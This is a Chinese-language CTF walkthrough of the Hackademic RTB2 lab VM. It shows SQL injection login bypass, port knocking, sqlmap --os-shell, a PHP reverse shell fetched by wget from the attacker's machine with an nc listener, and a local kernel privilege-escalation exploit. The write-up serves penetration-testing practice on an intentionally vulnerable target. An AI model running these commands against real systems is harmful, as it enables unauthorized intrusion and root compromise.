zoukankan      html  css  js  c++  java
  • Hackademic: RTB2

    Description

    • Name: Hackademic: RTB2
    • Date release: 6 Sep 2011
    • DHCP service: Enabled
    • IP address: Automatically assign
    • Task:get root and read the file key.txt

    Download

    (Size: 951 MB)

    主机发现

    nmap -sP 192.168.91.1/24
    

    靶机IP:192.168.91.133

    端口扫描

    nmap -sV -p- 192.168.91.133
    

    80端口(http)是开启的,还有个666/tcp filtered doom

    漏洞发现

    访问80端口Web服务

    image-20200710110216427

    使用万能密码登录'or 1=1--'

    image-20200710111507877.png

    得到一串字符编码,发送的Decoder进行解码,URL-->ASCII

    image-20200710111802202

    关键点:K n o c k K n o c k K n o c k i n ' o n h e a v e n ' s d o o r . . : )

    端口敲门服务

    该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

    将上面的二进制转为字符串,得到1001:1101:1011:1001

    nmap -p 1001,1101,1011,1001 192.168.91.135  # IP变了下
    

    image-20200710113203505

    此时666端口就开启了,访问

    image-20200710113240197

    得到的是一个joomla站点,通过msf发现SQL注入漏洞

    root# search joomla_plugins
    root# use auxiliary/scanner/http/joomla_plugins
    root# set rhosts 192.168.91.137
    root# ser rport 666
    root# run
    

    image-20200710154353350

    /index.php?option=com_abc&view=abc&letter=AS&sectionid='
    

    漏洞利用

    使用sqlmap

    sqlmap -u "http://192.168.91.137:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" --dbs --batch
    

    image-20200710155129889

    sqlmap -u "http://192.168.91.137:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1" -D joomla --os-shell --batch
    

    image-20200710155419321

    getshell

    启动一个python服务器上传shell,目录在/use/share/webshells/php,修改ip地址为Kali的IP地址

    python -m SimpleHTTPServer 80
    wget http://192.168.91.136/shell.php
    

    UK2BKs.png

    监听1234端口

    nc -lvp 1234
    

    访问:http://192.168.91.137:666/shell.php,成功反弹shell

    image-20200710160612969

    使用python更换shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    提权

    查看内核版本:

    www-data@HackademicRTB2:/$ uname -a
    Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
    

    具体参考:http://ne2ha.top/202006242/, exp为15285.c,需要先切换到/tmp目录下

    wget http://192.168.91.136/15285.c
    

    image-20200710161347750

    编译执行:

    gcc 15285.c -o kernel
    chmod 777 kernel
    ./kernel
    

    image-20200710161512761

    查找Key.txt文件在/root目录下,查看文件内容

    image-20200710161834143

    很明显的base64编码,将其解码

    base64 -d Key.txt > key
    

    通过cat查看得到的是一堆乱码,通过file指令得知是png图片,将其复制到/var/www目录下,然后访问:http://192.168.91.137:666/key.png

    image-20200710162153891

  • 相关阅读:
    linux下ssh端口的修改和登录
    linux找回密码
    XAMPP命令之LAMPP
    VirtualBox 复制vdi文件和修改vdi的uuid
    探讨PHP页面跳转几种实现技巧
    CSS盒模型和margin重叠
    8--数组旋转
    9--斐波那契数列
    7--动态规划
    6--树的遍历
  • 原文地址:https://www.cnblogs.com/yoloyanng/p/13279925.html
Copyright © 2011-2022 走看看